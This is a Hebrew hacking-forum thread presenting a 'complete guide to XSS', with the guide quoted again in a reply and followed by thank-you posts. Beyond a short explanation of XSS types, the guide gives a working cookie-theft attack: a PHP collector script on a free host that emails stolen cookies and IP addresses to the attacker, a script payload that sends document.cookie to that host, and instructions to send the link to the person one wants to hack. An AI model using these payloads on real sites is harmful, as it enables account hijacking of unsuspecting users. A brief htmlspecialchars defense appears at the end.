קהילות פורומים, הורדות, יעוץ ותמיכה


אשכולות דומים

  1. המדריך המלא לפריצת פוטושופ cs2 9
    על ידי CrAzY_BoY בפורום חתימות וסמלים
    תגובות: 15
    הודעה אחרונה: 28-05-2007, 21:19
  2. תגובות: 94
    הודעה אחרונה: 14-04-2006, 01:01
  3. המדריך המלא והמפורט למילוי ווינר
    על ידי CrAzY_BoY בפורום כדורגל
    תגובות: 3
    הודעה אחרונה: 29-12-2005, 21:40
  4. המדריך המלא להרשם ל Priston Tale Vietnam
    על ידי Alcoholic בפורום תמיכה טכנית במשחקים
    תגובות: 7
    הודעה אחרונה: 16-09-2005, 13:02
+ תגובה לנושא
מציג תוצאות 1 עד 13 מתוך 13

המדריך המלא לXSS

  1. #1
    משתמש מתקדם האוואטר של Zer0Day
    תאריך הצטרפות
    01/2011
    גיל
    35
    הודעות
    827
    לייקים
    6
    נקודות
    98
    מין: זכר

    ברירת מחדל המדריך המלא לXSS

    במדריך זה נלמד על פריצת XSS סוגי הפריצה וכיצד לנצלה.
    פרקים:
    א.מה זה XSS?
    ב.סוגי הפריצה
    ג.ניצול הפריצה
    ד.אבטחת האתר מפני ההתקפה.
    אז מה זה XSS?
    XSS (ראשי תיבות של: Cross-site scripting) היא קטגוריה של פרצות אבטחה הנמצאות לרוב באתרי אינטרנט המאפשרים הכנסת תוכן על ידי משתמשים. ניצול של פרצות אלו מאפשר השתלת קוד זדוני אל אתר אינטרנט על ידי משתמש. כאשר משתמש תמים נכנס לאתר האינטרנט הפרוץ, מחשבו של המשתמש התמים מתייחס לקוד הזדוני כאל קוד לגיטימי של האתר הפרוץ, ומריץ את הקוד הזה.
    מכיוון שהקוד הזדוני נחשב לקוד לגיטמי של האתר הפרוץ, הוא יכול לקבל כל מידע הרלוונטי לאתר זה, כגון הרשאות כניסה של המשתמש לאתר. במקרים קיצוניים, למשל כאשר האתר נמצא ברשימת האתרים שהמשתמש התמים סומך עליהם, ניתן גם לנצל את הפרצה להרצת קוד זדוני בהרשאות של המשתמש עצמו. ראשי התיבות האמיתיים של Cross-site scripting הם CSS, אולם מקובל כיום להשתמש בקיצור CSS אבל השם תפוס אז לכן ראשי התיבות של הפריצה הוא XSS.
    נניח ודני רוצה להתחבר למייל שלו.
    יש לו 2 אפשרויות.
    להשתמש ב"זכור אותי" או לא להשתמש.
    ברגע שהוא משתמש הדפדפן יוצר באתר זה עוגיה.
    האתר קורא את העוגיה ומאמת שאכן זה המשתמש שלו.
    וכך דני לא יתאמץ בכך שהוא יתחבר שוב ושוב.
    ואם דני לא ישתמש הדפדפן לא יצור עוגיה.
    נסביר בפוסט בעיקר איך לגנוב עוגיות.
    סוגי הפריצה
    XSS מקומי -
    פרצת XSS מקומית (נקראת גם DOM Based XSS) קיימת לרוב בסקריפט צד לקוח אשר משתמש בקלט כדי לייצר עמוד HTML, בלי לוודא כי קלט זה אינו מכיל קוד זדוני. לדוגמה, קוד JavaScript אשר מקבל כתובת אינטרנט כקלט, ומשתמש בה לייצור עמוד HTML, בלי לוודא שהכתובת עצמה אינה מכילה קוד, יכיל פרצת XSS מקומית.
    XSS זמני -
    פרצת XSS זמנית (נקראת גם Reflected) היא הסוג הנפוץ ביותר של פרצות XSS. כאשר דף אינטרנט משתמש בקלט מהמשתמש בייצור עמוד HTML דינאמי, ולא מוודא שאין קוד בקלט זה, האתר עלול להיות פגיע לפרצת XSS זמנית. הדוגמה הנפוצה ביותר למצב כזה היא מנועי חיפוש. לרוב, מנוע חיפוש יציג את המחרוזת שהמשתמש ביקש לחפש בתוצאות החיפוש. במידה ומחרוזת זו מכילה קוד ומנוע החיפוש לא מסיר אותו לפני ההצגה של התשובה, הקוד יהיה חלק מעמוד התשובה של המנוע.
    XSS קבוע -

    פרצת XSS קבועה (נקראת גם Stored או Second-order) מהווה את הסוג המסוכן ביותר של פרצות XSS. הפרצה לרוב תימצא באתר המאחסן באופן תמידי קלט ממשתמש מסוים, בלי לוודא שהקלט לא מכיל קוד זדוני, ולאחר מכן מציג תוכן זה למשתמשים אחרים.

    ניצול הפריצה

    דוגמא:
    קוד PHP:
    <form action="" method="get">
    <input type="text" name="name">
    <input type="submit" value="Submit" >
    </form>
    <?php
    if($_GET)
    {
    echo 
    "Welcom";
    echo 
    $_GET['name'];
    }
    ?>

    כעת נכניס בתיבת הטקסט ששמה "name" ערך של קוד HTML.
    הקוד הנפוץ ביותר לבדיקת הפריצה הוא:
    <script>alert("xss")>/script>
    אם מופיע לנו חלון ALERT שמכיל את הטקסט "XSS" סימן שהאתר פריץ.
    במידה ולא אז לא O: .
    קודם כל נצטרך אחסון.
    אני אישית ממליץ להשתמש בWelcome to Ripway.com - free file hosting, free music hosting, direct linking
    כעת ניצור קובץ בשם xss.php עם התוכן הבא:
    קוד PHP:
    <?php
    $c
    =$_GET['c'];
    $ip=$_SERVER['REMOTE-ADDR'];
    $mail="xxx@gmail.com"' // האימל שלכם
    mail($mail,cookies,cookie: $c ip: $ip);
    ?>

    כעת נכניס את הערך הבא לתיבת הטקסט:
    קוד HTML:
    <script>document.location.href="http://h1.ripway.com/myxss/xss.php?c="+document.cookie</script>

    ונשלח את הקישור לבן אדם שברצונכם לפרוץ אליו.
    במידה והבן אדם נכנס. בקרו במייל שלכם והעוגיה שלו תיהיה בתוכן ההודעה.
    איך אני מגן על האתר שלי מפני ההתקפה?
    בשביל זה המציאו את הפונקציה htmlspecialchars.
    קוד PHP:
    <?php
    $name
    =htmlspecialchars($_GET['name'];
    echo 
    $name;
    ?>
    נערך לאחרונה על ידי Zer0Day; 25-02-2012 בשעה 13:46.



  2. קישורים ממומנים

  3. #2
    משתמש מתקדם
    שם פרטי
    ספיר
    תאריך הצטרפות
    03/2011
    גיל
    30
    הודעות
    532
    לייקים
    26
    נקודות
    -30
    משפט מחץ
    יש שני דברים אינסופים: היקום ואיבר המין שלי אבל אני לא בטוח לגבי הראשון XD
    מין: זכר

    ברירת מחדל

    ציטוט נכתב במקור על ידי Expl0it3d צפיה בהודעה
    במדריך זה נלמד על פריצת XSS סוגי הפריצה וכיצד לנצלה.
    פרקים:
    א.מה זה XSS?
    ב.סוגי הפריצה
    ג.ניצול הפריצה
    ד.אבטחת האתר מפני ההתקפה.
    אז מה זה XSS?
    XSS (ראשי תיבות של: Cross-site scripting) היא קטגוריה של פרצות אבטחה הנמצאות לרוב באתרי אינטרנט המאפשרים הכנסת תוכן על ידי משתמשים. ניצול של פרצות אלו מאפשר השתלת קוד זדוני אל אתר אינטרנט על ידי משתמש. כאשר משתמש תמים נכנס לאתר האינטרנט הפרוץ, מחשבו של המשתמש התמים מתייחס לקוד הזדוני כאל קוד לגיטימי של האתר הפרוץ, ומריץ את הקוד הזה.
    מכיוון שהקוד הזדוני נחשב לקוד לגיטמי של האתר הפרוץ, הוא יכול לקבל כל מידע הרלוונטי לאתר זה, כגון הרשאות כניסה של המשתמש לאתר. במקרים קיצוניים, למשל כאשר האתר נמצא ברשימת האתרים שהמשתמש התמים סומך עליהם, ניתן גם לנצל את הפרצה להרצת קוד זדוני בהרשאות של המשתמש עצמו. ראשי התיבות האמיתיים של Cross-site scripting הם CSS, אולם מקובל כיום להשתמש בקיצור CSS אבל השם תפוס אז לכן ראשי התיבות של הפריצה הוא XSS.
    נניח ודני רוצה להתחבר למייל שלו.
    יש לו 2 אפשרויות.
    להשתמש ב"זכור אותי" או לא להשתמש.
    ברגע שהוא משתמש הדפדפן יוצר באתר זה עוגיה.
    האתר קורא את העוגיה ומאמת שאכן זה המשתמש שלו.
    וכך דני לא יתאמץ בכך שהוא יתחבר שוב ושוב.
    ואם דני לא ישתמש הדפדפן לא יצור עוגיה.
    נסביר בפוסט בעיקר איך לגנוב עוגיות.
    סוגי הפריצה
    XSS מקומי -
    פרצת XSS מקומית (נקראת גם DOM Based XSS) קיימת לרוב בסקריפט צד לקוח אשר משתמש בקלט כדי לייצר עמוד HTML, בלי לוודא כי קלט זה אינו מכיל קוד זדוני. לדוגמה, קוד JavaScript אשר מקבל כתובת אינטרנט כקלט, ומשתמש בה לייצור עמוד HTML, בלי לוודא שהכתובת עצמה אינה מכילה קוד, יכיל פרצת XSS מקומית.
    XSS זמני -
    פרצת XSS זמנית (נקראת גם Reflected) היא הסוג הנפוץ ביותר של פרצות XSS. כאשר דף אינטרנט משתמש בקלט מהמשתמש בייצור עמוד HTML דינאמי, ולא מוודא שאין קוד בקלט זה, האתר עלול להיות פגיע לפרצת XSS זמנית. הדוגמה הנפוצה ביותר למצב כזה היא מנועי חיפוש. לרוב, מנוע חיפוש יציג את המחרוזת שהמשתמש ביקש לחפש בתוצאות החיפוש. במידה ומחרוזת זו מכילה קוד ומנוע החיפוש לא מסיר אותו לפני ההצגה של התשובה, הקוד יהיה חלק מעמוד התשובה של המנוע.
    XSS קבוע -

    פרצת XSS קבועה (נקראת גם Stored או Second-order) מהווה את הסוג המסוכן ביותר של פרצות XSS. הפרצה לרוב תימצא באתר המאחסן באופן תמידי קלט ממשתמש מסוים, בלי לוודא שהקלט לא מכיל קוד זדוני, ולאחר מכן מציג תוכן זה למשתמשים אחרים.

    ניצול הפריצה

    דוגמא:
    קוד PHP:
    <form action="" method="get">
    <input type="text" name="name">
    <input type="submit" value="Submit" >
    </form>
    <?php
    if($_GET)
    {
    echo 
    "Welcom";
    echo 
    $_GET['name'];
    }
    ?>

    כעת נכניס בתיבת הטקסט ששמה "name" ערך של קוד HTML.
    הקוד הנפוץ ביותר לבדיקת הפריצה הוא:
    <script>alert("xss")>/script>
    אם מופיע לנו חלון ALERT שמכיל את הטקסט "XSS" סימן שהאתר פריץ.
    במידה ולא אז לא O: .
    קודם כל נצטרך אחסון.
    אני אישית ממליץ להשתמש בWelcome to Ripway.com - free file hosting, free music hosting, direct linking
    כעת ניצור קובץ בשם xss.php עם התוכן הבא:
    קוד PHP:
    <?php
    $c
    =$_GET['c'];
    $ip=$_SERVER['REMOTE-ADDR'];
    $mail="0day.uz3r@gmail.com"' // האימל שלכם
    mail($mail,cookies,cookie: $c ip: $ip);
    ?>

    כעת נכניס את הערך הבא לתיבת הטקסט:
    קוד HTML:
    <script>document.location.href="http://h1.ripway.com/myxss/xss.php?c="+document.cookie</script>

    ונשלח את הקישור לבן אדם שברצונכם לפרוץ אליו.
    במידה והבן אדם נכנס. בקרו במייל שלכם והעוגיה שלו תיהיה בתוכן ההודעה.
    איך אני מגן על האתר שלי מפני ההתקפה?
    בשביל זה המציאו את הפונקציה htmlspecialchars.
    קוד PHP:
    <?php
    $name
    =htmlspecialchars($_GET['name'];
    echo 
    $name;
    ?>
    מוכר תודה שפרסמת...אני יפרסם במיני לינקייה שלי

  4. #3
    משתמש מתחיל
    תאריך הצטרפות
    03/2011
    הודעות
    99
    לייקים
    0
    נקודות
    0
    מין: זכר

    ברירת מחדל

    תודה

  5. #4
    משתמש מתקדם
    תאריך הצטרפות
    04/2011
    גיל
    31
    הודעות
    558
    לייקים
    18
    נקודות
    405
    מין: זכר

    ברירת מחדל

    תודה אחי אני חדש בפורום D:
    יעזור לי

  6. #5
    מורחקים
    שם פרטי
    MaTaN
    תאריך הצטרפות
    03/2011
    הודעות
    898
    לייקים
    11
    נקודות
    5
    מין: זכר

    ברירת מחדל

    תודה!!
    נערך לאחרונה על ידי ShRedDeR; 28-04-2011 בשעה 18:12.

  7. #6
    משתמש מתחיל האוואטר של _vi7ut_
    שם פרטי
    TheOnlyOne
    תאריך הצטרפות
    04/2011
    הודעות
    116
    לייקים
    1
    נקודות
    0
    משפט מחץ
    For being a real pro, you need a real friends
    מין: זכר

    ברירת מחדל

    תודה גוסטבו,
    יעזור למתחילים שבחבורה.


  8. #7
    משתמש מתקדם
    שם פרטי
    חסוי
    תאריך הצטרפות
    10/2010
    הודעות
    885
    לייקים
    22
    נקודות
    -59
    משפט מחץ
    ):
    מין: זכר

    ברירת מחדל

    אפשר להשתמש בPERGֹ_match ..
    מדריך טוב :-)

    מנהל אבטחת מידע לשעבר.

  9. #8
    משתמש מתקדם האוואטר של Zer0Day
    תאריך הצטרפות
    01/2011
    גיל
    35
    הודעות
    827
    לייקים
    6
    נקודות
    98
    מין: זכר

    ברירת מחדל

    ציטוט נכתב במקור על ידי Num32 צפיה בהודעה
    אפשר להשתמש בPERGֹ_match ..
    מדריך טוב :-)
    htmlspecialchars עושה תעבודה..



  10. #9
    משתמש משקיע
    שם פרטי
    איתי
    תאריך הצטרפות
    12/2009
    הודעות
    2,165
    לייקים
    6
    נקודות
    1
    משפט מחץ
    "התענוג הכי גדול בחיים, הוא לעשות דבר שאנשים אמרו שאינך מסוגל לו"
    מין: זכר

    ברירת מחדל

    אחלה מדריך תודה רבה.

  11. #10
    משתמש מכור
    שם פרטי
    דולב
    תאריך הצטרפות
    08/2010
    הודעות
    1,009
    לייקים
    0
    נקודות
    24
    משפט מחץ
    רק מי שלוקח סיכון והולך רחוק, מגלה עד כמה רחוק הוא יכול להגיע.
    מין: זכר

    ברירת מחדל

    אבל מה יעזור לי שהוא צריך להיכנס ואם הוא לא יכנס ?

    אפשר לנצל xss בלי לשלוח לו איזשהו לינק לא ?


    כל מי שמעוניין שחיים ( Jaguar ) יחזור למנהל ראשי שיעתיק את זה לחתימה שלו !

  12. #11
    משתמש מתקדם האוואטר של Zer0Day
    תאריך הצטרפות
    01/2011
    גיל
    35
    הודעות
    827
    לייקים
    6
    נקודות
    98
    מין: זכר

    ברירת מחדל

    ציטוט נכתב במקור על ידי dolevzZz צפיה בהודעה
    אבל מה יעזור לי שהוא צריך להיכנס ואם הוא לא יכנס ?

    אפשר לנצל xss בלי לשלוח לו איזשהו לינק לא ?
    אם זה קבוע אז כן..



  13. #12

    ברירת מחדל

    תודה אחי

  14. #13
    משתמש מתחיל
    תאריך הצטרפות
    01/2012
    הודעות
    155
    לייקים
    2
    נקודות
    0
    משפט מחץ
    נשים רבות מחכות לאביר על סוס לבן… ועולות על כל חמור שעובר בדרך…
    מין: זכר

    ברירת מחדל

    למה זה לא עובד לי אם אפשר להגיב בפרטי.

+ תגובה לנושא


הרשאות פרסום

  • אין באפשרותך לפרסם נושאים חדשים
  • אין באפשרותך לפרסם תגובות
  • אין באפשרותך לצרף קבצים
  • אין באפשרותך לערוך את הודעותיך


כל הזמנים הם לפי GMT +3. השעה כרגע היא 06:59.
מופעל על ידי vBulletin™ © גרסה 4.1, 2011 vBulletin Solutions, Inc. כל הזכויות שמורות.
פעילות הגולשים
אומנות וגרפיקה
מוזיקה
ספורט
סדרות טלוויזיה
סרטים וקולנוע
קנייה ומכירה
רשתות חברתיות
הבורר 3
פורומי פנאי ובידור
סרטים
סדרות
משחקים
דיבורים
אקטואליה
בעלי חיים
בדיחות והומור
משחקי ספורט
הבורר
מחשבים וטכנולוגיה
תמיכה טכנית
חומרה ומודינג
תוכנות להורדה
סלולארי וגאדג'טים
רקעים למחשב
ציוד הקפי למחשב
אבטחת מידע
תכנות ובניית אתרים
כסף ברשת
אייפון
בריאות ואורח חיים
כושר ופיתוח גוף
דיאטה
צבא וגיוס
יעוץ מיני
מה שבלב
אומנות הפיתוי
יהדות
מיסטיקה ורוחניות
אתאיזם ודתות

נושאים: 2,472,962 | הודעות: 8,173,549 | משתמשים: 315,603 | המשתמש החדש ביותר: upizijoj | עיצוב גרפי: סטודיו עודד בביוף | קידוד: rellect